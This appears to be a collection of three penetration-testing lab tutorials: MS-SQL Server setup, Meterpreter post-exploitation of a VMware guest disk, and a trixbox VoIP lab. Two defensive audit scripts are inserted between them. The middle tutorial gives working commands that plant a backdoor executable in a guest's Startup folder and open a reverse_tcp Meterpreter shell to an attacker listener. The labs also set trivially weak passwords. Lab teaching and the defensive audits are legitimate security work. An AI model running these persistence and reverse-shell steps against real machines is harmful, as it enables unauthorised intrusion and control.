MS-SQL Penetration Testing Lab Setup

Hello friends!! Today you will learn how to install and configure MS SQL Server on the Windows 10 operating system.

Requirement:
1. Download setup file ENU\x64\SQLEXPR_x64_ENU.exe
2. Download setup file ENU\x86\SQLManagementStudio_x86_ENU.exe
3. Download the HeidiSQL tool

Configure SQL express setup

Open the first downloaded file for the SQL Server installation and run it as administrator. Click on Installation, then choose New SQL Server stand-alone installation.


To install SQL Server 2012, follow the three steps given below:
·         License terms
·         Product updates
·         Install setup files

Here, enable the check box for “I accept the license terms” and click on Next.






Feature Selection
Now select the features you want to install. From the given image you can see that I enabled the check boxes for the following features:
·         Database Engine Services
·         SQL Server Replication
·         SQL Client Connectivity SDK

Click on Next.


Specify the name and instance ID for the instance of SQL Server. The directory structure, registry structure, and service names all reflect the instance name and a specific instance ID. The instance ID becomes part of the installation path.

·         Enter SQLExpress in the text field for Named instance
·         Enter SQLExpress in the text field for Instance ID

Then click on Next.

You can also select Default instance if no instance of SQL Server was installed previously. With a default instance, a user does not need to give the instance name to create a connection.




Your SQL Server 2012 installation has completed successfully; here you can check the status of the installed features.



Now open SQL Server Configuration Manager, where you will see a left and a right panel.
Click on Protocols for SQLExpress in the left panel and then select the protocol name “TCP/IP” in the right panel.


Under the IP Addresses tab, specify TCP port 1433, click on Apply, and enable TCP/IP.


Configure SQL Management Studio setup
Now open the second downloaded application for the SQL Server Management Studio setup and add a new feature to it.



There are no updates for SQL Server 2012; click on Next.



Installation type
Since we have already created the instance “SQLExpress”, we can now add features to the SQLExpress instance of SQL Server 2012.
From the image given below you can observe the table of installed instances. Click on Next.



Feature selection
To install the instance feature, enable the check box for Management Tools - Basic under shared features, then click on Next and Next.


The Management Tools - Basic installation has completed successfully; here you can check the status of the installed features. Click on Installation, then choose New SQL Server stand-alone installation.


Now log in to SQL Server using the admin credentials and click on Connect.


Once you are logged in to SQL Server, explore the Security folder and create a new login account for other users.


From the given image you can observe that master is the default database.


Connect to server
Run the HeidiSQL tool to connect to the MS SQL Server as the ignite user, as given below:
Network type: TCP/IP
Hostname /IP: 192.168.1.104
User: ignite
Password: 123456
Port: 1433

HeidiSQL is a useful and reliable tool designed for web developers using the popular MySQL server, Microsoft SQL databases and PostgreSQL. It enables you to browse and edit data, and to create and edit tables, views, procedures, triggers and scheduled events.

Now click on Open.


Great!! We have successfully accessed the database system of the MS SQL server. You can modify or create new tables or new databases and much more.




Post Exploitation in VMDK with Meterpreter

Hello friends!! Today you will learn how to exploit any operating system running inside a virtual machine.

Requirement
Attacker: Kali Linux
Target: VM image Windows Server 2012

First, the attacker needs to exploit the actual (host) operating system of the victim PC and obtain a meterpreter session with admin privileges.
From the given image you can see that I have obtained a Windows 10 meterpreter session and also gained admin privileges.


meterpreter > sysinfo


When you install any operating system in VMware Workstation, all its hardware and network settings are stored as a .vmx file on the host operating system, which is used to create the new virtual image.
Type the following to search for the .vmx files stored on it:
meterpreter > search -f *.vmx -r
From the given image you can see that it has dumped all the locations where .vmx files are stored.


We opened the .vmx file of the Windows Server 2012 VM image with the cat command.

meterpreter > cat "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"


From the image given below you can read the details of this file, which describes the network and hardware settings.


This module mounts a vmdk file (Virtual Machine Disk) on a drive provided by the user by taking advantage of the vstor2 device driver (VMware). First, it executes the binary vixDiskMountServer.exe to access the device and then it sends certain control code via DeviceIoControl to mount it. Use the write mode with extreme care. You should only open a disk file in writable mode if you know for sure that no snapshots or clones are linked from the file.

use post/windows/manage/vmdk_mount
msf post(vmdk_mount) > set DEL_LCK true
msf post(vmdk_mount) > set READ_MODE false
msf post(vmdk_mount) > set session 2
msf post(vmdk_mount) > set VDK_PATH "d:/VM/windows-server-2012/windows Server 2012/windows Server 2012.vmx"
msf post(vmdk_mount) > run

Great!! We have successfully mounted the vmdk file of Windows Server 2012.


meterpreter > show_mount
Now from the image given below you can read the information for each drive.


Now, using the command given below, I will upload an exe backdoor to the L: drive, which will give us a reverse connection from Windows Server 2012 when it is running inside VMware Workstation.
meterpreter > upload /root/Desktop/abc.exe "L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup"



use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.113
msf exploit(handler) > set lport 445
msf exploit(handler) > run

Awesome!! We have successfully exploited the Windows Server 2012 virtual machine and gained its meterpreter session.
meterpreter > sysinfo
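
A defender's check for the persistence step above, as an added example that is not part of the original post: it scans the all-users Startup folder of an offline-mounted guest volume and flags executables by their PE header rather than by file name. The allowlist, the extension set and the sample files are assumptions constructed for this example.

```python
import tempfile
from pathlib import Path

# All-users Startup folder, relative to the root of the mounted guest volume.
STARTUP_REL = Path("ProgramData/Microsoft/Windows/Start Menu/Programs/Startup")
ALLOWED = {"desktop.ini"}            # assumption: only this file is expected
SCRIPT_EXT = {".lnk", ".bat", ".cmd", ".vbs", ".js", ".ps1"}

def is_pe(path):
    """True if the file starts with MZ and e_lfanew points at a PE signature."""
    with open(path, "rb") as fh:
        head = fh.read(0x40)
        if len(head) < 0x40 or head[:2] != b"MZ":
            return False
        fh.seek(int.from_bytes(head[0x3C:0x40], "little"))
        return fh.read(4) == b"PE\0\0"

def audit_startup(mount_root):
    """Return sorted (file name, reason) findings for the guest's Startup folder."""
    folder = Path(mount_root) / STARTUP_REL
    findings = []
    if not folder.is_dir():
        return findings
    for entry in folder.iterdir():
        if not entry.is_file() or entry.name.lower() in ALLOWED:
            continue
        if is_pe(entry):             # content check, so a renamed .exe is still caught
            findings.append((entry.name, "PE executable"))
        elif entry.suffix.lower() in SCRIPT_EXT:
            findings.append((entry.name, "script or shortcut"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: a minimal PE stub under two names plus benign files."""
    folder = Path(root) / STARTUP_REL
    folder.mkdir(parents=True)
    stub = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0"
    (folder / "abc.exe").write_bytes(stub)
    (folder / "report.txt").write_bytes(stub)      # executable hidden behind .txt
    (folder / "desktop.ini").write_text("[.ShellClassInfo]\n")
    (folder / "readme.txt").write_text("plain text, ignored\n")
    return folder

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        for name, reason in audit_startup(root):
            print(f"{name}: {reason}")
```

Point `audit_startup` at the root of a guest disk mounted read-only during a forensic review; any finding in this folder runs at the next logon of any user in the guest.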


Lab Setup for VOIP Penetration Testing

Hello friends! Today you will learn how to set up VoIP in a virtual machine using the trixbox 2.8.0.4 ISO image for making phone calls and sending text messages in a local network.
From Wikipedia
Voice over Internet Protocol (also voice over IP, VoIP or IP telephony) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.

Let’s start!!

Open VMware and select the option “create new virtual machine”. In the install wizard, select the third option:
I will install the operating system later
Then click on Next.



Now select the second option, “Linux”, for the guest operating system and select the version “Ubuntu”. Then click on Next and Next as per your requirements.


Open the custom hardware settings to make the following changes:
Click on CD/DVD to browse to the ISO file “trixbox 2.8.0.4”.
Select bridged connection and enable the check box for replicate connection in the network adapter settings.
Then click on Finish.


Trixbox is the world's most popular Asterisk-based distribution. Trixbox enables even the novice user to quickly set up a voice over IP phone system and other necessary applications such as mysql and more. Trixbox can be configured to handle a single phone line for a home user, several lines for a small office, or several T1s for a million minute a month call center.

The VM will start rebooting automatically. For the trixbox CE installation, follow the steps given below:


A dialog box will appear for selecting the keyboard type; here choose the option “US” as shown in the image below. Then click on the OK tab.


Another dialog box will ask you to choose the time zone; select Asia/Kolkata. Then click on the OK tab.


Now enter the password you want to set for the root user. I used tribox as the password. Type it again to confirm the password and then click on the OK tab.


The installation process will now start automatically, which will take some time, as shown in the image below. Do not interrupt the installation until it is 100% complete.


Once the installation is complete, it will ask for a login. Type username: root and password: tribox


Check the network interface using the “ifconfig” command; from here I found my VM IP: 192.168.1.128.


Now open this IP: 192.168.1.218 in a web browser. Here, through the trixbox GUI, we are going to create some user accounts by assigning them extension numbers. For example, you receive an 8-digit number for your land-line from a service provider.


By default the trixbox GUI opens in user mode, and to create extension numbers we need to switch to admin mode.
Click on the switch option for user mode in the top right corner.



Authentication is required to log in to the admin mode of trixbox.
Now enter username: maint and password: password as the admin credentials.



You will get a pop-up message for trixbox registration; close this message.


On the trixbox platform you will see the server status. Now click on the PBX option and select the PBX Settings option from the given menu.


Under the admin setup list, select the Extensions option under basic setup.


Select device
Now follow the steps given below to create an extension inside the server:
Device: generic SIP device
Click on Submit


Add extension
User extension: 1234567 (any 7 digit number)
Display name: ignite (name of the user/customer you want to assign this number to)


Device options
Secret: 123
Dtmfmode: rfc2833


Once you have entered the information for creating a new extension, click on Submit.


Similarly, create one more extension so that we can check communication between both extensions.
From the given image you can see that we have now configured two extensions: the first for ignite [1234567] and the second for raj[12345678].

We have created two extensions, one as caller and the other as receiver. You can create multiple extensions as per your requirement.
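
The lab deliberately uses the short secret 123 for both extensions. As an added example (not part of the original post or of trixbox), the script below audits Asterisk sip.conf-style peer sections for secrets like these. The sample configuration is constructed, and the 12-character minimum and the section layout are assumptions of this example.

```python
import re
from collections import Counter
# Constructed sample in Asterisk sip.conf style (not copied from a real server).
SAMPLE_CONF = """\
[1234567]
type=friend
secret=123            ; the secret this page sets for ignite
dtmfmode=rfc2833
[12345678]
type=friend
secret=123
[2000]
secret=Vq7#tR2m!xLp09sZ
"""
MIN_LEN = 12  # assumption: minimum acceptable secret length for this audit

def parse_peers(text):
    """Parse [section] / key=value lines into {section: {key: value}}."""
    peers, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts a comment
        header = re.fullmatch(r"\[([^\]]+)\]", line)
        if header:
            current = peers.setdefault(header.group(1), {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            current[key.strip().lower()] = value.strip()
    return peers

def audit_secrets(text):
    """Return {extension: [reasons]} for every peer whose secret looks weak."""
    peers = parse_peers(text)
    reuse = Counter(p.get("secret", "") for p in peers.values())
    report = {}
    for ext, opts in peers.items():
        secret, reasons = opts.get("secret", ""), []
        if len(secret) < MIN_LEN:
            reasons.append("too short")
        if secret.isdigit():
            reasons.append("digits only")
        if secret and secret in ext:
            reasons.append("part of the extension number")
        if secret and reuse[secret] > 1:
            reasons.append("reused by another extension")
        if reasons:
            report[ext] = reasons
    return report

if __name__ == "__main__":
    print(audit_secrets(SAMPLE_CONF))
```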


Now click on the orange tile to apply the configuration changes and put them into effect.


A pop-up will open; here select continue with reload.
That covers the server installation and the configuration of extensions inside it.


Now download the Zoiper application on your system.
Zoiper is a VoIP softphone that lets you send messages, make voice and video calls with your friends, family, colleagues and business partners.

Once it is downloaded and opened, it will look like the image given below. Now go to the settings option to configure an account that will be able to make calls to or receive calls from another user.


Select the account type SIP and click on Next.


If you remember, in the trixbox GUI we added the extension 1234567 for ignite; now enter that information in the account wizard in order to save it as a new contact.
Now enter the user number with the server IP as given below.
Enter password for this account of your own choice.
Click on Next.


It will auto-detect the account name as shown in the given image. Then click on Next.


One account has now been created in the account list. Now ignite will be able to make calls to or receive calls from other users.


We have already created the ignite account on the system through Zoiper for making and receiving calls. Now we need to install Zoiper on another device for the other users, who will be able to make calls to or receive calls from ignite.
Download Zoiper from the Google Play Store on your Android phone. Run the application after installation.


Click on the config icon to configure a new account on your phone, as shown in the given image, and select the Accounts option from the given list of configuration options.




A new dialog box will pop up again; select manual configuration for the account setup.




Account name: raj
Host: 192.168.1.218
Username: 12345678
Password: 123

Now click on Save.


You can see from the given image that the account for raj is ready.
Hence we have set up two accounts in Zoiper. One will act as caller: let's say raj is the caller, making a call to ignite from his phone, and ignite will be the receiver and get the incoming call from raj on the system.


As you know, we configured two extensions, one for ignite and another for raj. Now we are going to test this VoIP setup by making a call from raj.


Raj made a call to ignite by dialing his number 1234567; when you do this, you will hear the outgoing ring tone from your phone.


Ignite will get the incoming call on the system as shown in the given image. Click on Answer to accept the call from raj.


From the given screenshot you can see that the call is connected and raj and ignite are having a conversation over a VoIP call.


Great!!! In this way you can configure your VoIP server for a local network and communicate with multiple users by making calls or chatting.